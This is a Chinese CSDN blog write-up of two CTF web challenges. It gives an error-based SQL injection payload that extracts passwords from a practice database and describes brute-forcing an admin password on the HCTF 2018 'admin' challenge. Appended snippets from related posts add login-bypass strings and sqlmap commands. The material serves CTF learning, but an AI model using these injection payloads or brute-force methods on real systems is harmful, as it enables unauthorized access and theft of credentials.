极客大挑战easysql&[HCTF 2018]admin-wp

最新推荐文章于 2022-09-21 21:48:39 发布
最新推荐文章于 2022-09-21 21:48:39 发布
阅读量148 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/freerats/article/details/106262481
版权

极客大挑战easysql
在这里插入图片描述使用报错注入
最后的flag太长,无法显示全,用substr()分成两部分即可

payload:
check.php?username=1’and%20(extractvalue(1,concat(’~’,(select%20substr(password,25,50)%20from%20geekuser%20limit%203,1))))%23and%231%23

[HCTF 2018]admin

查看源代码,发现提示“你不是admin”,接着尝试注册admin的账号显示账号已存在。
然后对admin密码进行爆破,会出现三种状态码,123的状态码最特殊,尝试登入成功获得flag
![在这里插入图片描述](https://img-blog.csdnimg.cn/20200527091500979.png)![在这里插入图片描述](https://img-blog.csdnimg.cn/20200527091510515.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L2ZyZWVyYXRz,size_16,color_FFFFFF,t_70)

按照经验来说这种能爆破出来的弱密码不多,但遇到密码还是习惯性的爆破一下,万一出来了呢,没出来也不亏

冰可乐不加可乐
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
【WEB】[极客挑战2019]EasySQL WP
Miscedence__的博客
04-15 341
0X0000000000000001 审题 其实由题目可以知道这是道SQL注入,然后看到登录,首先尝试万能密码: admin’ or ‘1’='1 如名字所说,这是一道很ez的SQL注入 通过这道题,我们来延伸一下其他东西 0X0000000000000002 关于万能密码 为什么在注入的时候输入万能密码就可以进入呢,对于所有万能密码,都是”万能“的吗? 那么首先,让我们清楚 SQL注入-万能密码的注入原理 0_用户进行用户名和密码验证时,网站需要查询数据库,查询数据库就是执行SQL语句 //
[极客挑战 2019]EasySQL1
lljiuhkhk的博客
07-20 2500
CTF,sql注入,web渗透,安全入门
第十四届信息安全竞赛-easy_sql-wp
居上
06-28 152
随便输入一些,发现是post注入,直接bp抓包,将数据包内容全部放到1.txt中,sqlmap跑起来 sqlmap -r 1.txt --batch 发现三种类型的注入,接着我们跑下数据库 sqlmap -r 1.txt --batch --dbs 继续,爆表试试 sqlmap -r 1.txt --batch -D security --tables 发现到这一步,sqlmap就跑不了了,所以后端php脚本肯定是过滤了某些字符串,手动测试下,这里使用报错注入来试一试 uname=admin'.
【BUUCTF[极客挑战 2019]EasySQLwp
qq_58047053的博客
04-18 322
简单的sql注入 靶机打开后是一个网址,点进去会有这样的页面: 直接使用万能密码admin' or 1=1#,密码随意: 得到flag: 除了最简单的admin' or 1=1#之外,还有其他对应使用的万能密码,这篇csdn帖总结了一下万能密码: [极客挑战2019]easysql ...
buuctfweb刷题wp详解及知识整理----【SUCTF 2019】EasySQL(sql注入)
weixin_45784586的博客
03-22 980
写在前面 这个题不知道查询语句的源代码是真的难写 所查看大佬的博客: https://www.cnblogs.com/chrysanthemum/p/11729891.html https://blog.csdn.net/qq_44657899/article/details/104533077 尝试之路加wp 只有一个文本提交框 发现可以堆叠注入,用show命令 可得到 库名 为ctf,表名F...
BUUCTF[极客挑战2019]EasySQL
weixin_45253622的博客
05-04 191
打开环境,是个登录界面,猜测是POST型的SQL注入,后来提交参数发现是GET型的。 尝试注入,使用admin' 发现报错,判断是单引号闭合;试一下万能密码: admin' or '1'='1 用户名和密码都输入万能密码: ...
NSSCTF-极客挑战2020-web-wp
F1rstb100d
09-21 624
NSSCTF-极客挑战2020-web-wp
BUUCTF在线测评之[极客挑战 2019]EasySQL 1
weixin_49182737的博客
03-03 5433
启动靶机 只给了一个地址,点击进去即是靶机 可以看到这是一个登录页面 虽然靶机信息那已经提示我们这是一个EasySql,结合靶机页面是登录页面,把八九不离十的可以确定这一题是考察SQL注入的,并且Easy提示我们,是简单的sql注入。 BUT出于一个网安爱好者的心态,我们还是要简单看一下这个页面的信息,说不定出题者挖坑呢 。。。 虽然结果是然并卵 所以还是老老实实听提示试sql注入吧 这里安利一下firefox,这浏览器可以在拓展里装Hackbar,一款房间寻找web安全bug的插件 一个不太好的信息时
BUUCTF Web[极客挑战2019] EasySQL
qq_36348811的博客
03-28 313
问题分析 题目类型是Web类型,而且是一个登录页面,首先考虑是否是SQL注入。 先尝试闭合方式,输入1,1’,1"判断,当输入为1’时报错,所以判断结果语句应该为单引号闭合。 根据报错信息,尝试注入,在此之前了解一下万能用户名和万能密码。 补充知识 所谓的万能密码就是绕过登录验证直接进入管理员后台的密码,这种类型的密码可以通用到很多存在此漏洞的网站,所以称之为万能。 最常用的管理员用户名:admin root user test guest select * from table_na
xctf攻防世界easysql wp
sash1mi
02-20 1896
xctf攻防世界easysql wp 考察知识点: SQL注入 二次注入 python脚本 访问题目地址 有注册和登录两个功能 经测试发现该题目存在二次注入 https://www.jianshu.com/p/3fe7904683ac username:'k3vin"/ password:k3vin email:k3vin 注册成功后有一个修改密码的页面 修改密码,报如下错误 猜测并构造payload: 1"||extractvalue(1,concat(0x7e,(select(database
BUUCTF:[SUCTF 2019]EasySQL
末初的CSDN博客
10-06 5677
题目地址:https://buuoj.cn/challenges#[SUCTF%202019]EasySQL SQL查询,观察回显,这里应该是用var_dump()输出 在测试查询的时候发现有些字符能使用,有些字符被过滤了,因此查询点进行fuzz测试,看看过滤了哪些字符 回包长度为523的都是可以使用的,其他的字符均已被过滤 PS:这里使用Burp进行fuzz的线程不要开太高,容易报429,fuzz的字符不多可以慢慢跑 ;可以使用,尝试堆叠注入 首先这里的query参数无论我们输入数字什么都只会回
BUUCTF-wp-极客挑战easy sql
Accompany的博客
11-28 2792
一个小小的分享,对于BUUCTF 极客挑战easy sql 的解法 打开web题目,发现是一个登陆页面,我们首先就要想到sql注入,用万能密码进行尝试,如下: 使用万能密码后恰巧登陆成功可得到flag
CTF [极客挑战 2019]EasySQL Writeup 万能密码
baynk的博客
04-06 3165
这个诚不欺我,真的很简单。。。 一顿操作后没发现什么有用的信息,输入了个admin/admin 跳转到了check.php了,在username处加个常规的'看是否有报错。 真的有,尝试万能密码admin' or '1'='1 但是没出结果,但是这里肯定是用注入的,接着使用,第二种,不去判断密码的正确性。admin' or 1=1 %23 直接就出来了,这里还可以在password处再用...
EasySQL 轻松上手的数据库框架
你缺少想象力的博客
09-17 2020
EasySQL是由我独立开发的一款操作数据库的框架,特点是上手容易,使用简单。 目前版本是 v0.1.3 那么我就开始了,这款框架目前已有的功能如下: 创建数据库 删除数据库 创建表 增删改查 数据库自动升级 平时不怎么鼓捣数据库的,用数据库的时候,感觉也就这几个功能哈! 那么我也不按照顺序来介绍这些功能应该怎么实现,我从开发的角度来接受如何使用这个框架吧! 使用 第一步:将...
CTF-Web-[极客挑战2019]EasySQL
归子莫的博客
05-02 2665
CTF-Web-[极客挑战2019]EasySQL 博客说明 文章所涉及的资料来自互联网整理和个人总结,意在于个人学习和经验汇总,如有什么地方侵权,请联系本人删除,谢谢!本文仅用于学习与交流,不得用于非法用途! CTP平台 网址 https://buuoj.cn/challenges 题目 Web类,[极客挑战2019]EasySQL 打开题目的实例 思路 题目类型是Web类型的,而且...
CMSEasySQL注入漏洞
此去清风白日,自由道风景好
09-03 1466
申明:分析分析,这个洞也不是我挖掘的。
[SUCTF 2019]EasySQL
qq_43619533的博客
12-07 9783
[SUCTF 2019]EasySQL 打开页面是一个搜索框,注入题,跑字典发现过滤的字符串。 由官方wp的解释来看,这道题目需要我们去对后端语句进行猜测,有点矛盾的地方在于其描述的功能和实际的功能似乎并不相符,通过输入非零数字得到的回显1和输入其余字符得不到回显来判断出内部的查询语句可能存在有||,也就是select 输入的数据||内置的一个列名 from 表名,进一步进行猜测即为select...
BUUCTF__[HCTF 2018]admin_题解
风过江南乱的博客
05-18 1592
一、看题 拿到题目,发现一个欢迎页面。有注册、登录功能。 首先习惯性 F12。发现提示。 提示不是 admin ,那我们尝试登录用户名 admin ,密码随便输入,提示密码错误。尝试注 册 admin ,提示账号已被注册,那么我们怎么才能用 admin 登录呢。 那先尝试随便注册一个账号登录看看有什么内容,注册用户名和密码都为1,登录。 发现有修改密码功能。 可以注册、登录、修改密码,很自然的想到二次注入。 事实上,预期解的确是二次注入,只不过有好几种非预期解法。 二、研究 这题得到flag,实
[SUCTF 2019]EasySQL 1 Writeup(超级详细)
热门推荐
StevenOnesir的博客
11-26 1万+
本文章是该系列的第三篇,同样涉及到基础sql注入原理。 首先我们能看到的就是一个输入框,直接告诉了你注入点。 做了一些简单的测试,直接过滤了from、union、extractvalue、PREPARE等关键字,回显提示:NONONO! 前面的那道sql我还是讲的比较中规中矩,这道sql骚一点。 先讲讲我的第一种玩法: 首先手工盲注嘛,会发现连sleep等都全部过滤掉了,而且你输入数字的时候回显是: Array ( [0] => 1 ) 输入字符的时候啥也不回显。 有经验的师傅这个时候其实就懂得要放
极客挑战 2019]EasySQL
最新发布
09-03
EasySQL极客挑战 2019 中的一个题目,它是一个简单的 SQL 数据库查询题目。可以通过编写 SQL 查询语句来实现对给定的数据库表进行数据查询和分析。 在 EasySQL 中,你将面对一个包含不同表的数据库,你需要...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值